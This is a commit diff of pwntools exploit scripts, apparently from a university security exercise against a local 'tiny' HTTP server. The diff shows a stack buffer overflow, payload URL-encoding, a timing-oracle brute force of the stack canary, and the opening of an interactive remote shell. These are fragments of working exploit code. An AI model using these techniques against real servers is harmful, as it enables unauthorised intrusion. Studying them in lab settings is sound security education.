robalb
diff --git a/‎debug.sh
Lines changed: 1 addition & 1 deletion b/‎debug.sh
Lines changed: 1 addition & 1 deletion
diff --git a/‎expl_1996.py
Lines changed: 4 additions & 5 deletions b/‎expl_1996.py
Lines changed: 4 additions & 5 deletions
diff --git a/‎expl_all.py
Lines changed: 6 additions & 8 deletions b/‎expl_all.py
Lines changed: 6 additions & 8 deletions
diff --git a/‎expl_canary.py
Lines changed: 21 additions & 13 deletions b/‎expl_canary.py
Lines changed: 21 additions & 13 deletions
diff --git a/‎tests/test
-16 KB b/‎tests/test
-16 KB
diff --git a/‎tests/test.c
Lines changed: 0 additions & 78 deletions b/‎tests/test.c
Lines changed: 0 additions & 78 deletions
diff --git a/‎tests/tiny
-1.11 MB b/‎tests/tiny
-1.11 MB
@@ -1 +1 @@
-gdb -x debugcmd.txt -p $(pgrep tiny)
+sudo -E gdb -x debugcmd.txt -p $(pgrep tiny)
@@ -22,13 +22,9 @@ def c(comment):
 
 def run_expl():
     p = remote(ADDR, PORT)
-    # p.clean()
-
     e = ELF(local_file)
     context.binary = e
     context.log_level = "info"
-    # libc = e.libc
-    # libc.address = libc_base
 
     shellcode_payload = f"""
 
@@ -112,7 +108,10 @@ def run_expl():
 
     try:
         success_marker = p.recvuntil(b'unimib24', timeout=1)
-        print("remote shell started! type a command")
+        print("-------------------")
+        print("started remote shell")
+        print("type a command")
+        print("-------------------")
         p.interactive()
     except:
         print("exploitation failed")
 
@@ -50,13 +50,11 @@ def run_expl(payload, padding=PADDING_SIZE, log=True):
     expl = b''
     expl += b'a'*padding
     expl += payload
-
     #url encode all the bytes that would block the http parser
     expl = expl.replace(b'%', b'%25')
     expl = expl.replace(b'?', b'%3f')
     for i in range(0x21):
         expl = expl.replace(bytes([i]), f'%{i:02X}'.encode())
-
     http_req = package_http_request(expl)
     if log:
         print("sending these request bytes:")
@@ -66,10 +64,14 @@ def run_expl(payload, padding=PADDING_SIZE, log=True):
 
 
 def run_expl_timer(expl):
+    """Run the given exploit, and measure the server response time
+
+    The exploit must cause a "File not found response"
+    This function will measure the time between the last
+    bytes sent and the EOF sent by the server.
+    """
     p = run_expl(expl, log=False)
     out = p.recvuntil(b'File not found')
-    #measure the time the server takes
-    #to close the socket as an oracle
     start = time.perf_counter()
     end = 0
     try:
@@ -113,10 +115,6 @@ def is_outlier(x):
 
     return is_outlier
 
-def c(comment):
-    """this is just a dummy function to insert comments in the asm string"""
-    return ""
-
 
 def main():
     context.log_level = "warn"
 
@@ -6,16 +6,16 @@
 
 context.terminal = ['tmux', 'splitw', '-h']
 
+local_file = './tiny.canary' # only canary protection
 ADDR = "127.0.0.1"
 PORT = 9999
-local_file = './tiny.canary' # only canary protection
+#these values won't be leaked or bruteforced
+#if they are manually set here
+CANARY_BYTES = b''
 
 e = ELF(local_file)
 context.binary = e
 context.log_level = "info"
-# libc = e.libc
-# libc.address = libc_base
-
 
 def package_http_request(path):
     """Craft the bytes for a valid HTTP/1.1 GET request containing our payload """
@@ -30,17 +30,15 @@ def package_http_request(path):
 def run_expl(payload, log=True):
     p = remote(ADDR, PORT)
     # buffer overflow
-    padding_size = 0x220       # tiny with canary
+    padding_size = 0x220
     expl = b''
     expl += b'a'*(padding_size-8) #8 is the canary size
     expl += payload
-
     #url encode all the bytes that would block the http parser
     expl = expl.replace(b'%', b'%25')
     expl = expl.replace(b'?', b'%3f')
     for i in range(0x21):
         expl = expl.replace(bytes([i]), f'%{i:02X}'.encode())
-
     http_req = package_http_request(expl)
     if log:
         print("sending these request bytes:")
@@ -50,10 +48,14 @@ def run_expl(payload, log=True):
 
 
 def run_expl_timer(expl):
+    """Run the given exploit, and measure the server response time
+
+    The exploit must cause a "File not found response"
+    This function will measure the time between the last
+    bytes sent and the EOF sent by the server.
+    """
     p = run_expl(expl, log=False)
     out = p.recvuntil(b'File not found')
-    #measure the time the server takes
-    #to close the socket as an oracle
     start = time.perf_counter()
     end = 0
     try:
@@ -105,13 +107,16 @@ def c(comment):
 
 def main():
     context.log_level = "warn"
-    test_sample_size = 10
-    treshold = 50
+    test_sample_size = 20
+    treshold = 3
     expl = b'' #no exploit, the server should not crash
-    crash_time_test = generate_crash_time_test(test_sample_size, expl, treshold)
 
     #bruteforce the canary
     canary_bytes = b''
+    if len(CANARY_BYTES):
+        canary_bytes = CANARY_BYTES
+    else:
+        crash_time_test = generate_crash_time_test(test_sample_size, expl, treshold)
 
     while len(canary_bytes) < 8:
         for j in range(0xff+2):
@@ -205,7 +210,10 @@ def main():
 
     try:
         success_marker = p.recvuntil(b'unimib24', timeout=1)
-        print("remote shell started! type a command")
+        print("-------------------")
+        print("started remote shell")
+        print("type a command")
+        print("-------------------")
         p.interactive()
     except:
         print("exploitation failed")
Original file line number	Diff line number	Diff line change
`@@ -1 +1 @@`
`1`		`-gdb -x debugcmd.txt -p $(pgrep tiny)`
	`1`	`+sudo -E gdb -x debugcmd.txt -p $(pgrep tiny)`